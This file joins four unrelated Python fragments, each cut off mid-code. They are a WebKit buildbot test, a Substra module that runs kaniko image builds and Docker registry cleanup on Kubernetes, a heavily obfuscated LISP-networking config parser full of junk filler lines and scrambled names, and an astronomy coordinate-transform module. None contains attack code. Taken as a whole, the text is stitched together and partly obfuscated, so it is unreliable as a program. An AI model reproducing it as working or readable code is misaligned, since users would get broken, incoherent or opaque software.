# SVN mirror feature isn't unittestable now with source.oldsource.SVN(==source.SVN) , only with source.svn.SVN(==SVN)
# https://bugs.webkit.org/show_bug.cgi?id=85887
if issubclass(CheckOutSource, source.SVN):
return
# Compare CheckOutSource.baseURL with SVNMirror (or with the default URL) in config.json for all builders
for builder in c['builders']:
for buildStepFactory, kwargs in builder['factory'].steps:
if str(buildStepFactory).split('.')[-1] == 'CheckOutSource':
CheckOutSourceInstance = buildStepFactory(**kwargs)
self.assertEqual(CheckOutSourceInstance.baseURL, self.get_SVNMirrorFromConfig(builder['name']))
class BuildStepsConstructorTest(unittest.TestCase):
# "Passing a BuildStep subclass to factory.addStep is deprecated. Please pass a BuildStep instance instead. Support will be dropped in v0.8.7."
# It checks if all builder's all buildsteps can be insantiated after migration.
# https://bugs.webkit.org/show_bug.cgi?id=89001
# http://buildbot.net/buildbot/docs/0.8.6p1/manual/customization.html#writing-buildstep-constructors
@staticmethod
def generateTests():
for builderNumber, builder in enumerate(c['builders']):
for stepNumber, step in enumerate(builder['factory'].steps):
builderName = builder['name'].encode('ascii', 'ignore')
setattr(BuildStepsConstructorTest, 'test_builder%02d_step%02d' % (builderNumber, stepNumber), BuildStepsConstructorTest.createTest(builderName, step))
@staticmethod
def createTest(builderName, step):
def doTest(self):
try:
buildStepFactory, kwargs = step
buildStepFactory(**kwargs)
except TypeError as e:
buildStepName = str(buildStepFactory).split('.')[-1]
self.fail("Error during instantiation | |
import kubernetes
import requests
import os
import json
import datetime
import logging
from django.conf import settings
from substrapp.utils import timeit
from substrapp.exceptions import PodErrorException, PodTimeoutException
import time
logger = logging.getLogger(__name__)
MEDIA_ROOT = os.getenv('MEDIA_ROOT')
REGISTRY = os.getenv('REGISTRY')
REGISTRY_SCHEME = os.getenv('REGISTRY_SCHEME')
REGISTRY_PULL_DOMAIN = os.getenv('REGISTRY_PULL_DOMAIN')
NAMESPACE = os.getenv('NAMESPACE')
NODE_NAME = os.getenv('NODE_NAME')
COMPONENT = 'substra-compute'
RUN_AS_GROUP = os.getenv('RUN_AS_GROUP')
RUN_AS_USER = os.getenv('RUN_AS_USER')
FS_GROUP = os.getenv('FS_GROUP')
KANIKO_MIRROR = settings.TASK['KANIKO_MIRROR']
KANIKO_IMAGE = settings.TASK['KANIKO_IMAGE']
COMPUTE_REGISTRY = settings.TASK['COMPUTE_REGISTRY']
HTTP_CLIENT_TIMEOUT_SECONDS = getattr(settings, 'HTTP_CLIENT_TIMEOUT_SECONDS')
REGISTRY_IS_LOCAL = settings.REGISTRY_IS_LOCAL
REGISTRY_SERVICE_NAME = settings.REGISTRY_SERVICE_NAME
K8S_PVC = {
env_key: env_value for env_key, env_value in os.environ.items() if '_PVC' in env_key
}
class ImageNotFound(Exception):
pass
class BuildError(Exception):
pass
def k8s_get_cache_index_lock_file(cache_index):
return f'/tmp/cache-index-{cache_index}.lock'
def k8s_try_create_file(path):
try:
fd = os.open(path, os.O_CREAT | os.O_EXCL)
os.close(fd)
return True
except FileExistsError:
return False
def k8s_acquire_cache_index():
celery_worker_concurrency = int(getattr(settings, 'CELERY_WORKER_CONCURRENCY'))
if celery_worker_concurrency == 1:
return None
max_attempts = 12
attempt = 0
while attempt < max_attempts:
for cache_index in range(1, celery_worker_concurrency + 1):
lock_file = k8s_get_cache_index_lock_file(cache_index)
if k8s_try_create_file(lock_file):
return str(cache_index)
attempt += 1
raise Exception(f'Could not acquire cache index after {max_attempts} attempts')
def k8s_release_cache_index(cache_index):
if cache_index is None:
return
lock_file = k8s_get_cache_index_lock_file(cache_index)
try:
os.remove(lock_file)
except FileNotFoundError:
pass
def watch_pod(name, watch_init_container=False):
kubernetes.config.load_incluster_config()
k8s_client = kubernetes.client.CoreV1Api()
finished = False
attempt = 0
max_attempts = 5 + (5 if watch_init_container else 0)
error = None
watch_container = not watch_init_container
logger.info(f'Waiting for pod {name}...')
pod_status = None
while (not finished) and (attempt < max_attempts):
try:
api_response = k8s_client.read_namespaced_pod_status(
name=name,
namespace=NAMESPACE,
pretty=True
)
if api_response.status.phase != pod_status:
pod_status = api_response.status.phase
logger.info(f'Status for pod "{name}" {api_response.status.phase} status')
# Handle pod error not linked with containers
if api_response.status.phase == 'Failed' or (api_response.status.reason and
'Evicted' in api_response.status.reason):
if api_response.status.reason:
error = api_response.status.reason
else:
error = f'Pod phase : {api_response.status.phase}'
logger.error(f'Status for pod "{name}" {api_response.status.phase.lower()} status')
finished = True
continue
if watch_init_container:
if api_response.status.init_container_statuses:
for init_container in api_response.status.init_container_statuses:
state = init_container.state
if state.terminated:
# TODO: support multiple init containers
if state.terminated.exit_code != 0:
finished = True
error = 'InitContainer: ' + get_pod_error(state.terminated)
else:
watch_container = True # Init container is ready
else:
if state.waiting and state.waiting.reason not in ['PodInitializing', 'ContainerCreating']:
error = 'InitContainer: ' + get_pod_error(state.waiting)
attempt += 1
logger.error(f'InitContainer for pod "{name}" waiting status '
f'(attempt {attempt}/{max_attempts}): {state.waiting.message}')
if watch_container:
if api_response.status.container_statuses:
for container in api_response.status.container_statuses:
state = container.state
if state.terminated:
finished = True
error = None
if state.terminated.exit_code != 0:
error = get_pod_error(state.terminated)
else:
# {"ContainerCreating", "CrashLoopBackOff", "CreateContainerConfigError",
# "ErrImagePull", "ImagePullBackOff", "CreateContainerError", "InvalidImageName"}
if state.waiting and state.waiting.reason not in ['PodInitializing', 'ContainerCreating']:
error = get_pod_error(state.waiting)
attempt += 1
logger.error(f'Container for pod "{name}" waiting status '
f'(attempt {attempt}/{max_attempts}): {state.waiting.message}')
if not finished:
time.sleep(0.2)
except Exception as e:
attempt += 1
logger.error(f'Could not get pod "{name}" status (attempt {attempt}/{max_attempts}): {e}')
if error is not None:
raise PodErrorException(f'Pod {name} terminated with error: {error}')
if not finished:
raise PodTimeoutException(f'Pod {name} didn\'t complete after {max_attempts} attempts')
def get_pod_error(state):
error = state.reason
if state.message is not None:
error += f' ({state.message})'
return error
def get_pod_name(name):
kubernetes.config.load_incluster_config()
k8s_client = kubernetes.client.CoreV1Api()
api_response = k8s_client.list_namespaced_pod(
NAMESPACE,
label_selector=f'app={name}'
)
if api_response.items:
pod = api_response.items.pop()
else:
raise Exception(f'Could not get pod name {name}')
return pod.metadata.name
def pod_exists(name):
kubernetes.config.load_incluster_config()
k8s_client = kubernetes.client.CoreV1Api()
try:
k8s_client.read_namespaced_pod(
name=name,
namespace=NAMESPACE)
except Exception:
return False
else:
return True
def wait_for_pod_deletion(name):
while pod_exists(name):
pass
@timeit
def get_pod_logs(name, container):
kubernetes.config.load_incluster_config()
k8s_client = kubernetes.client.CoreV1Api()
logs = f'No logs for pod {name}'
if pod_exists(name):
try:
logs = k8s_client.read_namespaced_pod_log(
name=name,
namespace=NAMESPACE,
container=container
)
except Exception:
pass
return logs
def container_format_log(container_name, container_logs):
if isinstance(container_logs, bytes):
logs = [f'[{container_name}] {log}' for log in container_logs.decode().split('\n')]
else:
logs = [f'[{container_name}] {log}' for log in container_logs.split('\n')]
for log in logs:
logger.info(log)
@timeit
def k8s_build_image(path, tag, rm):
try:
cache_index = k8s_acquire_cache_index()
_k8s_build_image(path, tag, rm, cache_index)
except Exception:
raise
finally:
k8s_release_cache_index(cache_index)
def _k8s_build_image(path, tag, rm, cache_index):
kubernetes.config.load_incluster_config()
k8s_client = kubernetes.client.CoreV1Api()
job_name = f'kaniko-{tag.split("/")[-1].replace("_", "-")}'
dockerfile_fullpath = os.path.join(path, 'Dockerfile')
dockerfile_mount_subpath = path.split('/subtuple/')[-1]
# kaniko build can be launched without privilege but
# it needs some capabilities and to be root
image = KANIKO_IMAGE
command = None
mount_path_dockerfile = path
mount_path_cache = '/cache'
args = [
f'--dockerfile={dockerfile_fullpath}',
f'--context=dir://{path}',
f'--destination={REGISTRY}/substrafoundation/user-image:{tag}',
'--cache=true',
'--log-timestamp=true',
'--verbosity=debug',
'--snapshotMode=redo',
'--push-retry=3',
'--cache-copy-layers',
'--single-snapshot'
]
if REGISTRY_SCHEME == 'http':
args.append('--insecure')
if KANIKO_MIRROR:
args.append(f'--registry-mirror={REGISTRY}')
if REGISTRY_SCHEME == 'http':
args.append('--insecure-pull')
# https://github.com/GoogleContainerTools/kaniko/issues/778
capabilities = ['CHOWN', 'SETUID', 'SETGID', 'FOWNER', 'DAC_OVERRIDE']
pod_security_context = get_pod_security_context(root=True)
container_security_context = get_security_context(root=True, add_capabilities=capabilities)
container = kubernetes.client.V1Container(
name=job_name,
image=image if not COMPUTE_REGISTRY else f'{COMPUTE_REGISTRY}/{image}',
command=command,
args=args,
volume_mounts=[
{'name': 'dockerfile',
'mountPath': mount_path_dockerfile,
'subPath': dockerfile_mount_subpath,
'readOnly': True}
],
security_context=container_security_context
)
if mount_path_cache is not None:
container.volume_mounts.append({
'name': 'cache',
'mountPath': mount_path_cache,
'subPath': cache_index,
'readOnly': True
})
pod_affinity = kubernetes.client.V1Affinity(
pod_affinity=kubernetes.client.V1PodAffinity(
required_during_scheduling_ignored_during_execution=[
kubernetes.client.V1PodAffinityTerm(
label_selector=kubernetes.client.V1LabelSelector(
match_expressions=[
kubernetes.client.V1LabelSelectorRequirement(
key="app.kubernetes.io/component",
operator="In",
values=["substra-worker"]
)
]
),
topology_key="kubernetes.io/hostname"
)
]
)
)
spec = kubernetes.client.V1PodSpec(
restart_policy='Never',
affinity=pod_affinity,
containers=[container],
volumes=[
{
'name': 'dockerfile',
'persistentVolumeClaim': {'claimName': K8S_PVC['SUBTUPLE_PVC']}
}
],
security_context=pod_security_context
)
if mount_path_cache is not None:
spec.volumes.append({
'name': 'cache',
'persistentVolumeClaim': {'claimName': K8S_PVC['DOCKER_CACHE_PVC']}
})
pod = kubernetes.client.V1Pod(
api_version='v1',
kind='Pod',
metadata=kubernetes.client.V1ObjectMeta(
name=job_name,
labels={'app': job_name, 'task': 'build',
'app.kubernetes.io/component': COMPONENT}
),
spec=spec
)
create_pod = not pod_exists(job_name)
if create_pod:
try:
logger.info(f'Creating pod {NAMESPACE}/{job_name}')
k8s_client.create_namespaced_pod(body=pod, namespace=NAMESPACE)
except kubernetes.client.rest.ApiException as e:
raise Exception(f'Error creating pod {NAMESPACE}/{job_name}. Reason: {e.reason}, status: {e.status}, '
f'body: {e.body}') from None
try:
watch_pod(job_name)
except Exception as e:
# In case of concurrent build, it may fail
# check if image exists
if not k8s_image_exists(tag):
logger.error(f'Kaniko build failed, error: {e}')
raise BuildError(f'Kaniko build failed, error: {e}')
finally:
if create_pod:
container_format_log(
job_name,
get_pod_logs(name=get_pod_name(job_name),
container=job_name)
)
k8s_client.delete_namespaced_pod(
name=job_name,
namespace=NAMESPACE,
body=kubernetes.client.V1DeleteOptions(
propagation_policy='Foreground',
grace_period_seconds=0
)
)
@timeit
def k8s_get_image(image_name):
response = requests.get(
f'{REGISTRY_SCHEME}://{REGISTRY}/v2/substrafoundation/user-image/manifests/{image_name}',
headers={'Accept': 'application/json'},
timeout=HTTP_CLIENT_TIMEOUT_SECONDS
)
if response.status_code != requests.status_codes.codes.ok:
raise ImageNotFound(f'Error when querying docker-registry, status code: {response.status_code}')
return response.json()
def k8s_image_exists(image_name):
try:
k8s_get_image(image_name)
except ImageNotFound:
return False
else:
return True
def k8s_remove_image(image_name):
logger.info(f'Deleting image {image_name}')
try:
response = requests.get(
f'{REGISTRY_SCHEME}://{REGISTRY}/v2/substrafoundation/user-image/manifests/{image_name}',
headers={'Accept': 'application/vnd.docker.distribution.manifest.v2+json'},
timeout=HTTP_CLIENT_TIMEOUT_SECONDS
)
if response.status_code != requests.status_codes.codes.ok:
# raise ImageNotFound(f'Error when querying docker-registry, status code: {response.status_code}')
return
digest = response.headers['Docker-Content-Digest']
response = requests.delete(
f'{REGISTRY_SCHEME}://{REGISTRY}/v2/substrafoundation/user-image/manifests/{digest}',
headers={'Accept': 'application/vnd.docker.distribution.manifest.v2+json'},
timeout=HTTP_CLIENT_TIMEOUT_SECONDS
)
if response.status_code != requests.status_codes.codes.accepted:
# raise ImageNotFound(f'Error when querying docker-registry, status code: {response.status_code}')
return
except Exception as e:
logger.exception(e)
def get_image_list_from_docker_registry():
response = requests.get(
f'{REGISTRY_SCHEME}://{REGISTRY}/v2/_catalog',
headers={'Accept': 'application/vnd.docker.distribution.manifest.v2+json'},
timeout=HTTP_CLIENT_TIMEOUT_SECONDS
)
response.raise_for_status()
res = response.json()
for repository in res['repositories']:
# get only user-image repo, images built by substra-backend
if repository == 'user-image':
response = requests.get(
f'{REGISTRY_SCHEME}://{REGISTRY}/v2/{repository}/tags/list',
headers={'Accept': 'application/vnd.docker.distribution.manifest.v2+json'},
timeout=HTTP_CLIENT_TIMEOUT_SECONDS
)
response.raise_for_status()
return response.json()
return None
def fetch_old_algo_image_names_from_docker_registry(max_duration):
logger.info(f'Fetch image names older than {max_duration}s')
images = get_image_list_from_docker_registry()
old_images = []
if images:
for image in images['tags']:
response = requests.get(
f'{REGISTRY_SCHEME}://{REGISTRY}/v2/user-image/manifests/{image}',
timeout=HTTP_CLIENT_TIMEOUT_SECONDS
)
response.raise_for_status()
# take the most recent date as creation date
created_date = max([
datetime.datetime.strptime(json.loads(e['v1Compatibility'])['created'].split('.')[0],
'%Y-%m-%dT%H:%M:%S')
for e in response.json()['history']
])
if (datetime.datetime.now() - created_date).total_seconds() >= max_duration:
old_images.append(image["name"])
return old_images
def k8s_docker_registry_garbage_collector():
logger.info('Launch garbage collect on docker-registry')
kubernetes.config.load_incluster_config()
k8s_client = kubernetes.client.CoreV1Api()
pod_name = get_pod_name('docker-registry')
exec_command = [
'/bin/sh',
'-c',
'/bin/registry garbage-collect /etc/docker/registry/config.yml 2>&1'
]
resp = kubernetes.stream.stream(
k8s_client.connect_get_namespaced_pod_exec,
pod_name,
NAMESPACE,
command=exec_command,
stderr=True,
stdin=True,
stdout=True,
tty=True,
_preload_content=False,
)
logs = []
while resp.is_open():
resp.update(timeout=1)
if resp.peek_stdout():
lines = resp.read_stdout()
for line in filter(None, lines.split("\n")):
logs.append(line)
else:
logger.info(logs[-1])
returncode = resp.returncode
resp.close()
if returncode != 0:
raise Exception(
f"Error running docker-registry garbage collector (exited with code {returncode})"
)
@timeit
def k8s_compute(image_name, job_name, command, volumes, task_label,
capture_logs, environment, remove_image, subtuple_key, compute_plan_key):
pull_domain = REGISTRY_PULL_DOMAIN
if REGISTRY_IS_LOCAL:
try:
registry_port = get_docker_registry_port()
except Exception as e:
raise Exception("Failed to retrieve docker registry node port") from e
pull_domain += f":{registry_port}"
# We cannot currently set up shm_size
# Suggestion https://github.com/timescale/timescaledb-kubernetes/pull/131/files
# 'shm_size': '8G'
task_args = {
'image': f'{pull_domain}/substrafoundation/user-image:{image_name}',
'name': job_name,
'command': command,
'volumes': volumes,
'label': task_label,
'environment': environment
}
try:
_k8s_compute(job_name, task_args, subtuple_key)
except (PodErrorException, PodTimeoutException) as e:
logger.error(e)
raise
except Exception as e:
logger.exception(e)
raise
finally:
if capture_logs:
container_format_log(
job_name,
get_pod_logs(name=get_pod_name(job_name),
container=job_name)
)
delete_compute_pod(job_name)
# Remove images
if remove_image:
k8s_remove_image(image_name)
def generate_volumes(volume_binds, name, subtuple_key):
volume_mounts = []
volumes = []
for path, bind in volume_binds.items():
if '/servermedias/' in path:
# /MOUNT/PATH/servermedias/...
volume_name = 'servermedias'
else:
# /MOUNT/PATH/medias/volume_name/...
volume_name = path.split('/medias/')[-1].split('/')[0]
subpath = path.split(f'/{volume_name}/')[-1]
pvc_name = [key for key in K8S_PVC.keys()
if volume_name in key.lower()]
if pvc_name:
pvc_name = pvc_name.pop()
else:
raise Exception(f'PVC for {volume_name} not found')
volume_mounts.append({
'name': volume_name,
'mountPath': bind['bind'],
'subPath': subpath,
'readOnly': bind['mode'] != 'rw'
})
volumes.append({
'name': volume_name,
'persistentVolumeClaim': {'claimName': K8S_PVC[pvc_name]}
})
# Unique volumes
volumes = list({v['name']: v for v in volumes}.values())
return volume_mounts, volumes
@timeit
def _k8s_compute(name, | |
90 - 90: OoO0O00 / Ii1I % iIii1I11I1II1 / O0 * oO0o / I1IiiI
if 83 - 83: II111iiii . ooOoO0o / oO0o
if 54 - 54: ooOoO0o - iIii1I11I1II1 - I11i % Ii1I / II111iiii
if 80 - 80: i11iIiiIii % iIii1I11I1II1 / i11iIiiIii
lisp . lisp_geo_list [ OooOO0o0oOoO ] = i11I1Ii1Iiii1
return
if 66 - 66: OoOoOO00 . iIii1I11I1II1 * I1ii11iIi11i - Ii1I - iIii1I11I1II1
if 28 - 28: OoOoOO00 % OoooooooOO
if 13 - 13: IiII . Oo0Ooo - I11i / oO0o - Oo0Ooo - I1IiiI
if 84 - 84: II111iiii
if 57 - 57: O0 * iIii1I11I1II1 % O0 . OoooooooOO
if 53 - 53: Ii1I / I1IiiI * Ii1I + o0oOOo0O0Ooo + oO0o - Oo0Ooo
if 16 - 16: OoO0O00 % I1Ii111 . i1IIi / I1ii11iIi11i - O0
def lisp_elp_command ( kv_pair ) :
if 85 - 85: i1IIi . i1IIi
O0oO0 = None
Ii11i1I1 = [ ]
if ( "address" in kv_pair ) :
for i1iIIiiIiII in range ( len ( kv_pair [ "address" ] ) ) :
OOI1 = lisp . lisp_elp_node ( )
Ii11i1I1 . append ( OOI1 )
if 59 - 59: OoooooooOO * o0oOOo0O0Ooo / I1Ii111
if 75 - 75: o0oOOo0O0Ooo - OoooooooOO
if 21 - 21: I1IiiI + iIii1I11I1II1 / i11iIiiIii / oO0o
for IiII1II11I in list ( kv_pair . keys ( ) ) :
oo00oO0O0 = kv_pair [ IiII1II11I ]
if 66 - 66: OoooooooOO + iII111i . IiII % i1IIi
if ( IiII1II11I == "elp-name" ) :
O0oO0 = lisp . lisp_elp ( oo00oO0O0 )
continue
if 58 - 58: OOooOOo % iII111i * O0 + I1ii11iIi11i - IiII
if 26 - 26: i1IIi / I1IiiI / I11i + I11i
for i1II111iiii in Ii11i1I1 :
O0OO0O = Ii11i1I1 . index ( i1II111iiii )
if ( O0OO0O >= len ( oo00oO0O0 ) ) : O0OO0O = len ( oo00oO0O0 ) - 1
oOOo0oO = oo00oO0O0 [ O0OO0O ]
if ( IiII1II11I == "probe" ) : i1II111iiii . probe = ( oOOo0oO == "yes" )
if ( IiII1II11I == "strict" ) : i1II111iiii . strict = ( oOOo0oO == "yes" )
if ( IiII1II11I == "eid" ) : i1II111iiii . eid = ( oOOo0oO == "yes" )
if ( IiII1II11I == "address" ) : i1II111iiii . address . store_address ( oOOo0oO )
if 6 - 6: II111iiii
if 1 - 1: ooOoO0o % Oo0Ooo . oO0o
if 98 - 98: II111iiii + II111iiii - iIii1I11I1II1 . OoOoOO00 . I1Ii111
if 99 - 99: oO0o . Ii1I * I1Ii111 * iIii1I11I1II1 / OoOoOO00 % IiII
if 70 - 70: I1ii11iIi11i . O0
if 70 - 70: Oo0Ooo + i11iIiiIii
if ( O0oO0 == None ) : return
if 44 - 44: i11iIiiIii / OOooOOo * ooOoO0o
if 88 - 88: i1IIi % OOooOOo / OoooooooOO * iII111i % ooOoO0o
if 5 - 5: I1ii11iIi11i * Ii1I % I11i % II111iiii
if 9 - 9: o0oOOo0O0Ooo % I1Ii111 + I11i
O0oO0 . elp_nodes = Ii11i1I1
lisp . lisp_elp_list [ O0oO0 . elp_name ] = O0oO0
return
if 55 - 55: OoO0O00 - I1ii11iIi11i
if 38 - 38: iIii1I11I1II1 % IiII % OoO0O00 % O0 * iIii1I11I1II1 / I1Ii111
if 65 - 65: OOooOOo - I1IiiI * I1Ii111
if 99 - 99: I1IiiI
if 64 - 64: I1ii11iIi11i * Ii1I * Oo0Ooo % IiII % ooOoO0o
if 55 - 55: II111iiii - I1Ii111 - OOooOOo % Ii1I
if 49 - 49: Oo0Ooo * I1Ii111
def lisp_rle_command ( kv_pair ) :
if 53 - 53: Oo0Ooo / Ii1I + oO0o . iII111i + IiII
o0OOO = None
iIiii1iI1Ii = [ ]
if ( "address" in kv_pair ) :
for i1iIIiiIiII in range ( len ( kv_pair [ "address" ] ) ) :
ooIi = lisp . lisp_rle_node ( )
iIiii1iI1Ii . append ( ooIi )
if 96 - 96: OoO0O00 + I1IiiI % Oo0Ooo
if 21 - 21: OoOoOO00 - i11iIiiIii - OoOoOO00
if 4 - 4: I11i . IiII
for IiII1II11I in list ( kv_pair . keys ( ) ) :
oo00oO0O0 = kv_pair [ IiII1II11I ]
if 39 - 39: OOooOOo . Oo0Ooo - OoOoOO00 * i11iIiiIii
if ( IiII1II11I == "rle-name" ) :
o0OOO = lisp . lisp_rle ( oo00oO0O0 )
continue
if 4 - 4: OoOoOO00 * O0 - I11i
if 72 - 72: I11i + ooOoO0o / I1IiiI . IiII % OoO0O00 / i11iIiiIii
for i1II111iiii in iIiii1iI1Ii :
O0OO0O = iIiii1iI1Ii . index ( i1II111iiii )
if ( O0OO0O >= len ( oo00oO0O0 ) ) : O0OO0O = len ( oo00oO0O0 ) - 1
oOOo0oO = oo00oO0O0 [ O0OO0O ]
if ( IiII1II11I == "level" ) :
if ( oOOo0oO == "" ) : oOOo0oO = "0"
i1II111iiii . level = int ( oOOo0oO )
if 13 - 13: I1Ii111 % o0oOOo0O0Ooo + OOooOOo + I1Ii111 + i11iIiiIii - I1ii11iIi11i
if ( IiII1II11I == "address" ) : i1II111iiii . address . store_address ( oOOo0oO )
if 70 - 70: II111iiii * II111iiii . I1IiiI
if 11 - 11: iII111i
if 20 - 20: Ii1I . I1Ii111 % Ii1I
if 5 - 5: OOooOOo + iII111i
if 23 - 23: I1Ii111 % iIii1I11I1II1 . I11i
if 95 - 95: Oo0Ooo + i11iIiiIii % OOooOOo - oO0o
if ( o0OOO == None ) : return
if 11 - 11: I1ii11iIi11i / O0 + II111iiii
if 95 - 95: I1Ii111 + IiII * iIii1I11I1II1
if 17 - 17: OoO0O00 - Oo0Ooo * O0 / Ii1I
if 19 - 19: i1IIi - iIii1I11I1II1 . I11i
o0OOO . rle_nodes = iIiii1iI1Ii
o0OOO . build_forwarding_list ( )
lisp . lisp_rle_list [ o0OOO . rle_name ] = o0OOO
return
if 2 - 2: Ii1I
if 12 - 12: i11iIiiIii - iIii1I11I1II1 * IiII * iII111i
if 19 - 19: O0 + oO0o + o0oOOo0O0Ooo
if 81 - 81: iIii1I11I1II1
if 51 - 51: o0oOOo0O0Ooo . I1ii11iIi11i * Ii1I / Oo0Ooo * II111iiii / O0
if 44 - 44: i11iIiiIii % I1Ii111 % oO0o + I11i * oO0o . Ii1I
if 89 - 89: OoooooooOO % II111iiii - OoO0O00 % i11iIiiIii
def lisp_json_command ( kv_pair ) :
if 7 - 7: IiII
try :
oOOOo0Oooo = kv_pair [ "json-name" ]
I1iiIIiI11I = kv_pair [ "json-string" ]
except :
return
if 15 - 15: Oo0Ooo + iII111i + I1IiiI * o0oOOo0O0Ooo
if 33 - 33: o0oOOo0O0Ooo * Oo0Ooo
oOO00O0Ooooo00 = lisp . lisp_json ( oOOOo0Oooo , I1iiIIiI11I )
oOO00O0Ooooo00 . add ( )
return
if 88 - 88: I1Ii111 % OOooOOo - OoOoOO00 - OoOoOO00 . I1IiiI
if 52 - 52: II111iiii / II111iiii / I1IiiI - I1Ii111
if 91 - 91: I1IiiI + o0oOOo0O0Ooo % II111iiii + OoO0O00
if 66 - 66: iIii1I11I1II1 * II111iiii % Oo0Ooo % I1IiiI - Ii1I
if 59 - 59: IiII % oO0o
if 21 - 21: OoooooooOO % OoOoOO00 - OoOoOO00 / I1ii11iIi11i / o0oOOo0O0Ooo
if 15 - 15: ooOoO0o / ooOoO0o % OoooooooOO . I1Ii111
if 93 - 93: I1ii11iIi11i * I1ii11iIi11i / OoooooooOO
if 6 - 6: I1ii11iIi11i * Oo0Ooo + iIii1I11I1II1
if 19 - 19: O0 % II111iiii * o0oOOo0O0Ooo
if 27 - 27: OOooOOo * IiII / i11iIiiIii - oO0o + II111iiii
if 43 - 43: I1ii11iIi11i - II111iiii
def lisp_get_lookup_string ( input_str ) :
if 56 - 56: I1ii11iIi11i . i1IIi / iII111i % oO0o / O0 * I11i
if 98 - 98: O0 + iII111i
if 23 - 23: OoooooooOO . iIii1I11I1II1 / i1IIi
if 31 - 31: Oo0Ooo - iIii1I11I1II1 / I11i . OoO0O00
OOOO0oo0 = input_str
I11iiI1i1 = None
if ( input_str . find ( "->" ) != - 1 ) :
I1i1Iiiii = input_str . split ( "->" )
OOOO0oo0 = I1i1Iiiii [ 0 ]
I11iiI1i1 = I1i1Iiiii [ 1 ]
if 74 - | |
<gh_stars>10-100
from __future__ import print_function
import numpy as np
from . import utils
import astropy.coordinates as c, astropy.units as u
# Optional dependencies are imported in the functions that
# use them. These include enlib.ephem, enlib.iers and enlib.pyfsla
# Python 2/3 compatibility
try: basestring
except NameError: basestring = str
class default_site:
lat = -22.9585
lon = -67.7876
alt = 5188.
T = 273.15
P = 550.
hum = 0.2
freq = 150.
lapse= 0.0065
base_tilt = 0.0107693
base_az = -114.9733961
def transform(from_sys, to_sys, coords, time=55500, site=default_site, pol=None, mag=None, bore=None):
"""Transforms coords[2,...] from system from_sys to system to_sys, where
systems can be "hor", "cel" or "gal". For transformations involving
"hor", the optional arguments time (in modified julian days) and site (which must
contain .lat (rad), .lon (rad), .P (pressure, mBar), .T (temperature, K),
.hum (humidity, 0.2 by default), .alt (altitude, m)). Returns an array
with the same shape as the input. The coordinates are in ra,dec-ordering."""
from_info, to_info = getsys_full(from_sys,time,site,bore=bore), getsys_full(to_sys,time,site,bore=bore)
ihand = get_handedness(from_info[0])
ohand = get_handedness(to_info[0])
# Apply the specified transformation, optionally computing the induced
# polarization rotation and apparent magnification
def transfunc(coords):
return transform_raw(from_info, to_info, coords, time=time, site=site, bore=bore)
fields = []
if pol: fields.append("ang")
if mag: fields.append("mag")
if pol is None and mag is None:
if len(coords) > 2: fields.append("ang")
if len(coords) > 3: fields.append("mag")
meta = transform_meta(transfunc, coords[:2], fields=fields)
# Fix the polarization convention. We use healpix
if "ang" in fields:
if ihand != ohand: meta.ang -= np.pi
if ohand != 'L': meta.ang = -meta.ang
# Create the output array. This is a bit cumbersome because
# each of the output columns can be either ang or mag, which
# might or might not have previous values that need to be
# updated. It is this way to keep backward compatibility.
res = np.zeros((2+len(fields),) + meta.ocoord.shape[1:])
res[:2] = meta.ocoord
off = 2
for i, f in enumerate(fields):
if f == "ang":
if len(coords) > 2: res[off+i] = coords[2] + meta.ang
else: res[off+i] = meta.ang
elif f == "mag":
if len(coords) > 3: res[off+i] = coords[3] * meta.mag
else: res[off+i] = meta.mag
return res
def transform_meta(transfun, coords, fields=["ang","mag"], offset=5e-7):
"""Computes metadata for the coordinate transformation functor
transfun applied to the coordinate array coords[2,...],
such as the induced rotation, magnification.
Currently assumes that input and output coordinates are in
non-zenith polar coordinates. Might generalize this later.
"""
if "mag_brute" in fields: ntrans = 3
elif "ang" in fields: ntrans = 2
else: ntrans = 1
coords = np.asarray(coords)
offsets = np.array([[0,0],[1,0],[0,1]])*offset
# Transform all the coordinates. We assume we aren't super-close to the poles
# either before or after the transformation.
ocoords = np.zeros((ntrans,2)+coords.shape[1:])
ocoords = None
for i in range(ntrans):
# Transpose to get broadcasting right
a = transfun((coords.T + offsets[i].T).T)
if ocoords is None:
ocoords = np.zeros((ntrans,)+a.shape, a.dtype)
ocoords[i] = a
class Result: pass
res = Result()
res.icoord = coords
res.ocoord = ocoords[0]
# Compute the individual properties we're interested in
diff = utils.rewind(ocoords[1:]-ocoords[0,None])
if "ang" in fields:
# We only need the theta offset of this one. We started with
# an offset in the [1,0] direction, and want to know how
# far we have rotated away from this direction. This
# Uses the IAU tangent plane angle convention:
# http://healpix.jpl.nasa.gov/html/intronode12.htm
# and assumes that both input and putput coordinates have the
# same handedness. This is not always the case, for example
# with horizontal to celestial coordinate transformations.
# In these cases, the caller must correct there resulting angle
# manually.
phiscale = np.cos(ocoords[0,1])
res.ang = np.arctan2(diff[0,1],diff[0,0]*phiscale)
if "mag" in fields:
res.mag = np.cos(res.icoord[1])/np.cos(res.ocoord[1])
if "mag_brute" in fields:
# Compute the ratio of the areas of the triangles
# made up by the three point-sets in the input and
# output coordinates. This ratio is always 1 when
# using physical areas, so we instead compute the
# apparent areas here.
def tri_area(diff):
return 0.5*np.abs(diff[0,0]*diff[1,1]-diff[0,1]*diff[1,0])
res.mag = (tri_area(diff).T/tri_area(offsets[1:]-offsets[0]).T).T
return res
def transform_raw(from_sys, to_sys, coords, time=None, site=default_site, bore=None):
"""Transforms coords[2,...] from system from_sys to system to_sys, where
systems can be "hor", "cel" or "gal". For transformations involving
"hor", the optional arguments time (in modified julian days) and site (which must
contain .lat (rad), .lon (rad), .P (pressure, mBar), .T (temperature, K),
.hum (humidity, 0.2 by default), .alt (altitude, m)). Returns an array
with the same shape as the input. The coordinates are in ra,dec-ordering.
coords and time will be broadcast such that the result has the same shape
as coords*time[None]."""
# Prepare input and output arrays
if time is None:
coords = np.array(coords)[:2]
else:
time = np.asarray(time)
coords = np.asarray(coords)
# Broadasting. A bit complicated because we want to handle
# both time needing to broadcast and coords needing to
time = time + np.zeros(coords[0].shape,time.dtype)
coords = (coords.T + np.zeros(time.shape,coords.dtype)[None].T).T
# flatten, so the rest of the code can assume that coordinates are [2,N]
# and time is [N]
oshape = coords.shape
coords= np.ascontiguousarray(coords.reshape(2,-1))
if time is not None: time = time.reshape(-1)
# Perform the actual coordinate transformation. There are three classes of
# transformations here:
# 1. To/from object-centered coordinates
# 2. cel-hor transformation, using slalib
# 3. cel-gal transformation, using astropy
(from_sys,from_ref), (to_sys,to_ref) = getsys_full(from_sys,time,site,bore=bore), getsys_full(to_sys,time,site,bore=bore)
if from_ref is not None: coords[:] = decenter(coords, from_ref[0], restore=from_ref[1])
